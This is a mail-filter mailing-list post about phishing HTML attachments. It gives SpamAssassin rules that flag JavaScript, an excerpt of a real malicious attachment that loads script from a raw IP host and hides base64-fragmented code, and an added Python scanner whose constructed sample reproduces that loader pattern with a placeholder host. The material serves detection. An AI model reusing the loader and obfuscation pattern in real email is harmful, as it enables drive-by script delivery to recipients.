[Mimedefang] HTML Mail / Active content filter
Florian Lohoff
f at zz.de
Tue Apr 11 07:34:01 EDT 2023
Hi Kevin,
On Tue, Apr 11, 2023 at 06:53:48AM -0400, Kevin A. McGrail via MIMEDefang wrote:
> There are a LOT of obfuscation techniques but there are also real (but very
> stupid) banks that do things like email html files for instructions to their
> clients and things.
>
> Do you have a sample of the file with the bad HTML and I can see if there
> are SA rules that hit it too?
Normal SpamAssassin did not match anything significant, so I added these as custom
rules:
# Script blocks declared with an explicit JavaScript MIME type
rawbody ZZ_JS_MIME /["']text\/javascript["']/i
describe ZZ_JS_MIME Javascript mimetype
score ZZ_JS_MIME 4
# <script> tag pulling its code from an external http(s) URL
rawbody ZZ_JS_SCRIPT /\<\s*script\s+.*src\s*=\s*["']\s*(https|http):/i
describe ZZ_JS_SCRIPT External javascript
score ZZ_JS_SCRIPT 7.0
# Low-weight catch-all: the bare word "javascript" anywhere in the body
rawbody ZZ_JS_SCRIPT2 /javascript/i
describe ZZ_JS_SCRIPT2 Only javascript string
score ZZ_JS_SCRIPT2 0.1
The HTML attachment part of the mail started like this. Then it had an image
as base64 and a div with hundreds of base64 snippets which, when merged, were
a long JavaScript. So I guess they included jQuery for its base64
decoder and the other external script URI to jumpstart decoding and
running the JS code.
<html lang="en">
<head>
<title>$customersname</title>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.3/jquery.min.js"></script>
<script type="text/javascript" src="http://213.194.163.32/ZAHJI.php?i=472"></script>
<style type="text/css">
[ ... ]
</style>
</head>
<body>
<div id="table"><p>KGZ1bmN0aW9uIChtaWR...</p><p>eXBlY3RpbmlicmFuY2goZ3JheXd ...
[ ... ]
Flo
--
Florian Lohoff f at zz.de
Any sufficiently advanced technology is indistinguishable from magic.
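As an added example that is not part of Florian's post and not code from MIMEDefang or SpamAssassin, the following Python script applies the same three checks as the rules above to a MIME message and goes one step further: it reassembles the base64 fragments spread across the <p> elements of the HTML attachment and looks for JavaScript in the decoded result. The sample message, the hidden payload and the external script host (203.0.113.10, a documentation address) are constructed for the demonstration; only the jQuery CDN URL is taken from the posted sample.

```python
"""Scanner for HTML mail carrying external or base64-fragmented JavaScript.

Added example, not from the original mailing-list post. All sample data
below is constructed; the payload and the 203.0.113.10 host are placeholders.
"""
import base64
import binascii
import re
from email import message_from_string, policy
from email.message import EmailMessage

# Same ideas as the ZZ_JS_MIME / ZZ_JS_SCRIPT rules, in Python regex syntax.
JS_MIME_RE = re.compile(r"""["']text/javascript["']""", re.I)
EXT_SCRIPT_RE = re.compile(
    r"""<\s*script\b[^>]*\bsrc\s*=\s*["']\s*(https?:[^"'>\s]+)""", re.I)
# <p> elements whose entire content looks like base64 (whitespace tolerated).
P_CHUNK_RE = re.compile(r"<p[^>]*>\s*([A-Za-z0-9+/=\s]+?)\s*</p>", re.I | re.S)
# A decoded blob must contain at least one of these before we call it JS.
JS_HINT_RE = re.compile(r"\b(function|var|let|const|eval|document|window)\b")


def reassemble_base64_chunks(html):
    """Join every base64-looking <p> fragment in document order and decode it.
    Returns the decoded text, or None when the fragments do not decode."""
    joined = "".join(re.sub(r"\s+", "", m) for m in P_CHUNK_RE.findall(html))
    if len(joined) < 16:          # too short to be a payload worth decoding
        return None
    joined += "=" * (-len(joined) % 4)   # obfuscators often strip the padding
    try:
        return base64.b64decode(joined, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None


def scan_html(html):
    """Return the three findings for one HTML document."""
    findings = {
        "js_mime": bool(JS_MIME_RE.search(html)),
        "external_scripts": EXT_SCRIPT_RE.findall(html),
        "hidden_js": False,
    }
    decoded = reassemble_base64_chunks(html)
    if decoded is not None and JS_HINT_RE.search(decoded):
        findings["hidden_js"] = True
    return findings


def scan_message(raw):
    """Walk every text/html part (inline or attached) and merge the findings."""
    msg = message_from_string(raw, policy=policy.default)
    merged = {"js_mime": False, "external_scripts": [], "hidden_js": False}
    for part in msg.walk():
        if part.get_content_type() != "text/html":
            continue
        f = scan_html(part.get_content())   # transfer encoding already undone
        merged["js_mime"] |= f["js_mime"]
        merged["external_scripts"] += f["external_scripts"]
        merged["hidden_js"] |= f["hidden_js"]
    return merged


# --- constructed sample data -------------------------------------------------
PAYLOAD_JS = "(function(){var u='http://example.invalid/stage2';document.write(u);})();"
_b64 = base64.b64encode(PAYLOAD_JS.encode()).decode()
# Split the base64 into short <p> fragments, as the described attachment did.
_chunks = "".join("<p>%s</p>" % _b64[i:i + 12] for i in range(0, len(_b64), 12))
SAMPLE_HTML = (
    '<html lang="en"><head><title>customer</title>'
    '<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.3/jquery.min.js"></script>'
    '<script type="text/javascript" src="http://203.0.113.10/loader.php?i=1"></script>'
    '</head><body><div id="table">' + _chunks + '</div></body></html>'
)
BENIGN_HTML = '<html><body><p>Hello</p><p>Your balance is 12.00</p></body></html>'


def build_sample_message():
    """Constructed mail with the malicious HTML as an attachment."""
    msg = EmailMessage()
    msg["From"] = "billing@example.invalid"
    msg["To"] = "victim@example.invalid"
    msg["Subject"] = "Your statement"
    msg.set_content("Please open the attached statement.")
    msg.add_attachment(SAMPLE_HTML, subtype="html", filename="statement.html")
    return msg.as_string()


if __name__ == "__main__":
    print(scan_message(build_sample_message()))
    print(scan_html(BENIGN_HTML))
```

The rawbody rules in the post see the HTML text after MIME decoding, so the external-script and MIME-type checks match directly; the fragment reassembly is what the SpamAssassin rules cannot express, and it is the check worth adding to a MIMEDefang filter when the attachment contains nothing but an empty-looking div full of short <p> blocks.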